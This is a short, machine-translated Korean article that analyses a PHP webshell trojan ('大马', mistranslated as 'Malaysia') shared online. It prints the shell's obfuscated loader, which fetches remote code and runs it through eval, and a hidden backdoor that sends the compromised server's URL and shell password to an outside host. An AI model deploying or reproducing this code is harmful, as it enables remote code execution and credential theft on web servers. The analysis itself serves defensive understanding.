>  기사  >  백엔드 개발  >  PHP 말레이시아 란 무엇입니까?

PHP 말레이시아 란 무엇입니까?

(*-*)浩
(*-*)浩원래의
2019-10-09 13:51:135489검색

大马: 트로이 목마 바이러스를 의미합니다. php Dama는 사이트 권한을 추출하기 위해 PHP로 작성된 프로그램으로, 권한을 높이거나 사이트를 수정하는 기능이 있으므로 트로이 목마라고 합니다.

PHP 말레이시아 란 무엇입니까?

누군가 PHP Malaysia를 공유했습니다(waf로 전달되었다고 가정), Eighty 백도어가 있을 확률, 간단한 분석 (권장 학습: PHP 비디오 튜토리얼)

<?php
      $password=&#39;Shiqi&#39;;//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION[&#39;PhpCode&#39;])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION[&#39;PhpCode&#39;]=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode(&#39;MTAx&#39;));
@eval($un($_SESSION[&#39;PhpCode&#39;]));
?>

변수는 총 3개입니다. $url , $get, $ un, 먼저 여러 변수를 ASCII 문자열로 변환하고, 그것이 무엇인지 확인하고, echo를 사용하여 출력합니다.

PHP 말레이시아 란 무엇입니까?

은 base64와 gzinflate를 기반으로 한 간단한 암호화입니다.

백도어 부분: #🎜 🎜 #

if(isset($_GET[&#39;login&#39;])==&#39;geturl&#39;){

    @set_time_limit(10);

    $serveru = $_SERVER [&#39;HTTP_HOST&#39;].$_SERVER[&#39;PHP_SELF&#39;];

    $serverp = envlpass;

    $copyurl = base64_decode(&#39;SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=&#39;);

    $url=$copyurl.$serveru.&#39;&pass=&#39;.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

function geturl(){

    @set_time_limit(10);

    $serveru = $_SERVER [&#39;HTTP_HOST&#39;].$_SERVER[&#39;PHP_SELF&#39;];

    $serverp = envlpass;

    $copyurl = base64_decode(&#39;&#39;);

    $url=$copyurl.$serveru.&#39;&p=&#39;.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

위 내용은 PHP 말레이시아 란 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.